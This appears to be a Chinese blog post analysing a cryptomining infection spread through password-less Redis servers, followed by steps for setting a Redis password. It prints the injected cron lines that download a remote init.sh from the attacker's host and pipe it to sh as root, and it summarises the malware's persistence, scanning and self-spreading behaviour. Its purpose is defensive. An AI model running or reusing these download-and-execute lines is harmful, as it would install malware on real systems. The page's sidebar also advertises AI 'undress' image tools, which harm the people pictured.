目錄
為什麼redis要設定密碼?
init.sh腳本內容是什麼?
is.sh腳本內容是什麼?
rs.sh腳本內容是什麼?
Redis如何設定密碼?
方式一:修改我們的redis.conf設定檔
方式二
首頁 資料庫 Redis Redis一定要設定密碼的原理是什麼

Redis一定要設定密碼的原理是什麼

May 26, 2023 pm 02:17 PM
redis

    為什麼redis要設定密碼?

    內網環境可以不設定密碼,但是個人伺服器,以及線上公網伺服器就有必要設定密碼了。

    昨天我檢查了一下minio在redis中的事件通知,當我查看redis的key時,發現出現了幾個不尋常的key。 backup1,backup2,backup3。然後我猜想應該是挖礦病毒。

    如下面所示:這樣就將定時任務和腳本注入到了我們機器當中,就會開始執行 init.sh 腳本

    backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
    backup2 "\n\n\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
    backup3 "\n\n\n*/4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
    backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
    登入後複製

    init.sh腳本內容是什麼?

    en2an.top/cleanfda/in…

    我們查看這個key的value能得到它會去請求一個位址,我們打開看一下這個init.sh到底是什麼東西。

    如下圖所示是個腳本檔。

    Redis一定要設定密碼的原理是什麼

    這個腳本還挺多的,關閉selinux、殺掉別人的挖礦進程、殺掉CPU佔用過高的進程,如果是自己就跳過、修改破壞系統指令、自己造一個下載器downloads()函數、解鎖和加鎖定時任務、新增挖礦技術任務、設定SSH免密登陸、下載執行礦機挖礦程序、關閉防火牆、清除日誌、感染已知的免密機器、下載執行is.sh。

    is.sh腳本內容是什麼?

    en2an.top/cleanfda/is…

    如下圖所示,上面的init.sh會下載我們的is.sh腳本。

    Redis一定要設定密碼的原理是什麼

    我們來看看這個腳本是做什麼。

    如下圖所示,這個腳本的內容也蠻多的。下載masscan掃描器、下載pnscan掃描器、安裝 redis 用於建立 redis 未授權存取的漏洞、執行 rs.sh。

    Redis一定要設定密碼的原理是什麼

    rs.sh腳本內容是什麼?

    en2an.top/cleanfda/rs…

    上面的連線可以查看這個腳本內容是什麼。

    Redis一定要設定密碼的原理是什麼

    開放 6379 端口、自動化利用redis未授權寫入定時任務,利用 pnscan 掃描b段IP 6379 端口,利用 masscan 進行掃描端口。

    Redis如何設定密碼?

    透過上述分析得出,該病毒實質為透過redis注入挖礦腳本起作用。如果你的redis沒有設定密碼,而且暴露在公網上就要小心了。

    可以透過以下兩種方式對我們的redis進行設定密碼。

    方式一:修改我們的redis.conf設定檔

    需要注意的是這種方式因為修改了設定文件, 需要重新啟動我們的redis才能生效。

    找到我們的redis.conf檔。

    Windows如下圖所示

    Redis一定要設定密碼的原理是什麼

    我們編輯此文件,找到requirepass,放開註釋,設定指定的值就,重啟redis就生效了。

    Redis一定要設定密碼的原理是什麼

    由於安裝方式可能因人而異,而我是透過docker進行安裝的並進行了映射。這裡就不給大家示範了,找到自己安裝在linux的redis目錄找到redis.conf設定文件,跟windows一樣的操作,設定完重啟就Ok了。

    方式二

    連接我們的redis,然後透過指令的方式設定密碼。

    這種方式比較簡單,而且不需要重新啟動就生效。

    下面的指令的意思是把密碼設定為123456,公網可不要設定這麼簡單阿。

    config set requirepass 123456
    登入後複製

    我們查看一下我們的redis的密碼。

    config get requirepass
    登入後複製

    這樣我們的密碼就設定成功了,退出我們的redis客戶端再次連線的時候就生效了。

    以上是Redis一定要設定密碼的原理是什麼的詳細內容。更多資訊請關注PHP中文網其他相關文章!

    本網站聲明
    本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

    熱AI工具

    Undresser.AI Undress

    Undresser.AI Undress

    人工智慧驅動的應用程序,用於創建逼真的裸體照片

    AI Clothes Remover

    AI Clothes Remover

    用於從照片中去除衣服的線上人工智慧工具。

    Undress AI Tool

    Undress AI Tool

    免費脫衣圖片

    Clothoff.io

    Clothoff.io

    AI脫衣器

    Video Face Swap

    Video Face Swap

    使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

    熱工具

    記事本++7.3.1

    記事本++7.3.1

    好用且免費的程式碼編輯器

    SublimeText3漢化版

    SublimeText3漢化版

    中文版,非常好用

    禪工作室 13.0.1

    禪工作室 13.0.1

    強大的PHP整合開發環境

    Dreamweaver CS6

    Dreamweaver CS6

    視覺化網頁開發工具

    SublimeText3 Mac版

    SublimeText3 Mac版

    神級程式碼編輯軟體(SublimeText3)

    redis集群模式怎麼搭建 redis集群模式怎麼搭建 Apr 10, 2025 pm 10:15 PM

    Redis集群模式通過分片將Redis實例部署到多個服務器,提高可擴展性和可用性。搭建步驟如下:創建奇數個Redis實例,端口不同;創建3個sentinel實例,監控Redis實例並進行故障轉移;配置sentinel配置文件,添加監控Redis實例信息和故障轉移設置;配置Redis實例配置文件,啟用集群模式並指定集群信息文件路徑;創建nodes.conf文件,包含各Redis實例的信息;啟動集群,執行create命令創建集群並指定副本數量;登錄集群執行CLUSTER INFO命令驗證集群狀態;使

    redis怎麼讀取隊列 redis怎麼讀取隊列 Apr 10, 2025 pm 10:12 PM

    要從 Redis 讀取隊列,需要獲取隊列名稱、使用 LPOP 命令讀取元素,並處理空隊列。具體步驟如下:獲取隊列名稱:以 "queue:" 前綴命名,如 "queue:my-queue"。使用 LPOP 命令:從隊列頭部彈出元素並返回其值,如 LPOP queue:my-queue。處理空隊列:如果隊列為空,LPOP 返回 nil,可先檢查隊列是否存在再讀取元素。

    redis數據怎麼清空 redis數據怎麼清空 Apr 10, 2025 pm 10:06 PM

    如何清空 Redis 數據:使用 FLUSHALL 命令清除所有鍵值。使用 FLUSHDB 命令清除當前選定數據庫的鍵值。使用 SELECT 切換數據庫,再使用 FLUSHDB 清除多個數據庫。使用 DEL 命令刪除特定鍵。使用 redis-cli 工具清空數據。

    centos redis如何配置Lua腳本執行時間 centos redis如何配置Lua腳本執行時間 Apr 14, 2025 pm 02:12 PM

    在CentOS系統上,您可以通過修改Redis配置文件或使用Redis命令來限制Lua腳本的執行時間,從而防止惡意腳本佔用過多資源。方法一:修改Redis配置文件定位Redis配置文件:Redis配置文件通常位於/etc/redis/redis.conf。編輯配置文件:使用文本編輯器(例如vi或nano)打開配置文件:sudovi/etc/redis/redis.conf設置Lua腳本執行時間限制:在配置文件中添加或修改以下行,設置Lua腳本的最大執行時間(單位:毫秒)

    redis命令行怎麼用 redis命令行怎麼用 Apr 10, 2025 pm 10:18 PM

    使用 Redis 命令行工具 (redis-cli) 可通過以下步驟管理和操作 Redis:連接到服務器,指定地址和端口。使用命令名稱和參數向服務器發送命令。使用 HELP 命令查看特定命令的幫助信息。使用 QUIT 命令退出命令行工具。

    redis過期策略怎麼設置 redis過期策略怎麼設置 Apr 10, 2025 pm 10:03 PM

    Redis數據過期策略有兩種:定期刪除:定期掃描刪除過期鍵,可通過 expired-time-cap-remove-count、expired-time-cap-remove-delay 參數設置。惰性刪除:僅在讀取或寫入鍵時檢查刪除過期鍵,可通過 lazyfree-lazy-eviction、lazyfree-lazy-expire、lazyfree-lazy-user-del 參數設置。

    如何優化debian readdir的性能 如何優化debian readdir的性能 Apr 13, 2025 am 08:48 AM

    在Debian系統中,readdir系統調用用於讀取目錄內容。如果其性能表現不佳,可嘗試以下優化策略:精簡目錄文件數量:盡可能將大型目錄拆分成多個小型目錄,降低每次readdir調用處理的項目數量。啟用目錄內容緩存:構建緩存機制,定期或在目錄內容變更時更新緩存,減少對readdir的頻繁調用。內存緩存(如Memcached或Redis)或本地緩存(如文件或數據庫)均可考慮。採用高效數據結構:如果自行實現目錄遍歷,選擇更高效的數據結構(例如哈希表而非線性搜索)存儲和訪問目錄信

    redis計數器怎麼實現 redis計數器怎麼實現 Apr 10, 2025 pm 10:21 PM

    Redis計數器是一種使用Redis鍵值對存儲來實現計數操作的機制,包含以下步驟:創建計數器鍵、增加計數、減少計數、重置計數和獲取計數。 Redis計數器的優勢包括速度快、高並發、持久性和簡單易用。它可用於用戶訪問計數、實時指標跟踪、遊戲分數和排名以及訂單處理計數等場景。

    See all articles